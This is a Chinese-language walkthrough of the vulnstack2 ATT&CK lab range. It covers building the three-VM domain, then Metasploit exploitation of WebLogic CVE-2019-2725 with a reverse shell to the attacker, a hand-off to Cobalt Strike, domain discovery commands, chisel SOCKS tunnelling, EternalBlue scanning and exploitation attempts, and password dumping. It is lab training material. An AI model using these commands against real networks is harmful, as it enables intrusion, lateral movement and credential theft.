红日安全ATT＆CK靶机实战系列之vulnstack2

---

typora-root-url: pic\ATT＆CK靶机实战系列——vulnstack2

声明

好好学习，天天向上

环境配置

下载地址，直接进去用百度云，没有会员也下的非常快

http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

边下载着，可以开始vmware的网络配置

下图为官方给出的，从虚拟机网络来看，好像和vulnstack1差不多啊，DMZ区就是边界

192.168.239.1/24就是外网，10.10.10.1/24就是内网

攻击者Internet：kali+windows的攻击机（我自己设置的NAT网段的192.168.239.*，模拟外网）
DMZ：对外边界服务器，Win2008（64位）
办公区：域成员也得上网，win7（32位）
核心区：域控，2012（64位）

所以这中间出现两个网段，一个外网网段，一个内网网段

鉴于需要两个网段，我们需要在vmware上做一些配置

首先，用一块仅主机的VMnet2（10.10.10.0），另一块NAT的VMnet8（192.168.239.0），这个不会调，可以百度

调完vmware，三台服务器都下好了，分别解压，然后，直接打开vmx文件就好，主要是网络配置

WEB.de1ay.com相当于网关服务器（对外边界服务器），所以自然要两张网卡，顺序不要错哦

PC.da1ay.com，跟WEB.de1ay.com的网络配置一样

DC.de1ay.com

网络配置完成，现在，可以登进去每个服务器看一看，是不是成功获取了IP，密码1qaz@WSX

按道理来讲，是不用修改配置的，但是作者把IP都写死了，内网网段10的我们不用管，因为都是新增的网卡VMnet2，也调成了10，主要是外网网段，每个人都不一样，作者把外网网段都写成了192.168.111.1/24，所以我们要么把我们的NAT修改成111段的，要不就进到每一台服务器中，其实就是WEB和PC，把第一块网卡的IP从111改成自己的NAT网段，我是239，这里举个WEB服务器的例子

注意只有WEB的这台服务器，密码会显示错误，把快照转到1.3的就好了，然后修改网络需要输入管理员administrator/1qaz@WSX

我只把C段改成了239，原来是192.168.111.80，我改成了192.168.239.80

下面是IP表

攻击者：
kali
192.168.239.198

windows
192.168.239.158

靶场：
WEB：对外边界服务器
10.10.10.80
192.168.239.80

PC：域成员
192.168.239.201
10.10.10.201

DC：域控
10.10.10.10

然后进入WEB中，来到C:\Oracle\Middleware\user_projects\domains\base_domain\bin 路径

使用管理员才能进去administrator/1qaz@WSX

注意！！！分别右键，以管理员权限执行setDomainENV、startManageWeblogic、startWeblogic

开启成功后，cmd是一直会保持在的，搭过java的web服务或者weblogic的都懂

环境配置到此结束

战斗

Web渗透

信息收集

kali扫描存活

arp-scan -l
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.239.1/24

扫描详细信息

nmap -T4 -A 192.168.239.80 -p 1-65535 -oN nmap.A

7001醒目的摆在了眼前，还是老版本10.3.6.*

访问7001

http://192.168.239.80:7001

shell-Weblogic

使用weblogic的扫描工具

git clone https://github.com/dr0op/WeblogicScan.git

执行

pip3 install -r requirements.txt
python3 WeblogicScan.py 192.168.239.80 7001

存在很多漏洞

开始利用，网上有很多种方式，我这里选取比较麻烦的一种

进入msf查看一下漏洞利用脚本

msfconsole
search CVE-2019-2725

4月底，发布的exploit/multi/misc/weblogic_deserialize_asyncresponseservice

这个模块默认的targets是unix，所以还要设置成windows

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set target 1
set LHOST 192.168.239.198
set LPORT 6666
run

权限维持/提升

提权一下

派生给CS，在CS上线，和我的上一篇vulnstack1里面差不多，就不详细说了

启动CS

nohup ./teamserver 192.168.239.198 123456 >/dev/null &
./cobaltstrike

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.239.198
set lport 7777
set session 1
run

CS的这个界面，每次看都特别有感觉，顺便提权

内网渗透

信息收集

拿下了第一台服务器的system，进行一波信息收集

ipconfig /all   # 查看本机ip，所在域
route print     # 打印路由信息
net view        # 查看局域网内其他主机名
arp -a          # 查看arp缓存
net start       # 查看开启了哪些服务
net share       # 查看开启了哪些共享
net share ipc$  # 开启ipc共享
net share c$    # 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件

net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators    # 查看本地管理员组（通常会有域用户）
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain    # 查看域中某工作组
net time /domain           // 主域服务器会同时作为时间服务器
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器（可能有多台）
net group "Enterprise Admins" /domain    // 查看域管理员组

经过一番收集后

目标Web服务器主机的操作系统为Windows Server 2008，具有两个网卡分别连通192.168.1.1/24和10.10.10.1/24两个网段

目标主机所在的网络存在域环境，域名为de1ay.com，存在两台域主机WEB和PC，域控制器为DC.de1ay.com，主机名为DC，域管理员为Administrator。

分别ping一下DC和PC，解析出来这两个就是我们下面的目标咯

DC 10.10.10.10
PC 10.10.10.201（还没通）

横向渗透

kali添加代理进行一波内网的信息收集了

使用chisel，windows用windows的amd64，linux用linux的amd64，因为都是64位的

https://github.com/jpillora/chisel/releases/

meterpreter上传给windows代理工具

upload /app/tools/chisel.exe C:\\Oracle\\Middleware\\user_projects\\domains\\base_domain\\bin\\chisel.exe

windows后台运行代理

start /b chisel.exe server -p 1090 --socks5

kali配置代理工具

vim /etc/proxychains4.conf
socks5 127.0.0.1 1080

执行代理工具

nohup ./chisel client 192.168.239.80:1090 socks &

nmap扫描

proxychains nmap -Pn -sT 10.10.10.1/24 > nmap_res.txt

和我们信息收集到的一样

接下来，目标就是这两台了

10.10.10.10和10.10.10.201

msf加代理扫永恒之蓝，时间还挺久了

setg Proxies socks5:127.0.0.1:1080
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.10.1/24
set threads 5
run

10和201都有，先试试201

setg Proxies socks5:127.0.0.1:1080       // 预先设置好代理
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.10.201
set lport 6777
set AutoRunScript post/windows/manage/migrate             // 自动迁移进程
run

位数不对，算了

用CS把密码都列出来

用vulnstack1中同样的方式，将其他域内服务器都上线

真是内网大杀器